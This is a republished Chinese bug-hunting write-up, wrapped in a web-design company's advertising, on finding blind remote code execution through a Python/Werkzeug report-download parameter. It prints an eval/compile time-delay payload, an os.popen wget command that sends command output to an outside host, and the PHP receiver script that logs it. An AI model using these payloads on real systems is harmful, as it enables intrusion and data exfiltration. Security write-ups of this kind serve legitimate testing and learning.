网创优客建站品牌官网
为成都网站建设公司企业提供高品质网站建设
热线:028-86922220
成都专业网站建设公司

定制建站费用3500元

符合中小企业对网站设计、功能常规化式的企业展示型网站建设

成都品牌网站建设

品牌网站建设费用6000元

本套餐主要针对企业品牌型网站、中高端设计、前端互动体验...

成都商城网站建设

商城网站建设费用8000元

商城网站建设因基本功能的需求不同费用上面也有很大的差别...

成都微信网站建设

手机微信网站建站3000元

手机微信网站开发、微信官网、微信商城网站...

建站知识

当前位置:首页 > 建站知识

如何解析曲折的RCE挖掘分析

这期内容当中小编将会给大家带来有关如何解析曲折的RCE挖掘分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

创新互联公司-专业网站定制、快速模板网站建设、高性价比黄陂网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式黄陂网站制作公司更省心,省钱,快速模板网站建设找我们,业务覆盖黄陂地区。费用合理售后完善,10余年实体公司更值得信赖。

简单记录一下这个漏洞,没啥特殊的手法,就是细心与fuzz

目标应用有一个下载文件的功能,你可以以csv格式下载报告

如何解析曲折的RCE挖掘分析  

抓包结果如下:

如何解析曲折的RCE挖掘分析  

看起来好像没啥问题,但是响应中的Werkzaug与python吸引了我的注意,不了解Werkzaug的可以去看一下

我尝试着用一些其他的payload替换了params参数的值,都是报错,看起来真就没啥问题,我都准备不看这个点了,但是,当我用空参数的时候,服务器返回了500错误

如何解析曲折的RCE挖掘分析  

这说明这个参数还是会影响服务器的运行的嘛(当然也不一定,这里只是我的一个猜测),为了进一步确定,我开始fuzz这个参数

最后把各种报错整理了一下,发现所有和python相关的payload都报了500错误????

看起来有戏,于是把python rce的payload进行了一下url编码,

eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29

成功执行,服务器产生了延时:

如何解析曲折的RCE挖掘分析  

由于数据不会回显,我们就只有用其他手法来外带数据了,还记得上一篇文章的内容吗?

没有看上一篇文章的快回头去瞅瞅????

构造payload:

eval(compile("""for x in range(1):\n import os\n os.popen(r'wget http://axin.com:8000/shell.php?cmd="$(ls -la)”)read()”””,’’,’single’))

然后在我们的服务器axin.com上部署一份shell.php文件,文件内容如下:

$a = fopen('POC.txt', 'a');
fwrite($a, $_GET["cmd"]);
fclose($a);
?>
 

发送payload,并查看POC.txt文件的内容:

如何解析曲折的RCE挖掘分析  

nice的不得了,当然,也可以直接弹shell

上述就是小编为大家分享的如何解析曲折的RCE挖掘分析了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注创新互联行业资讯频道。


新闻名称:如何解析曲折的RCE挖掘分析
文章位置:http://bjjierui.cn/article/iippsp.html

其他资讯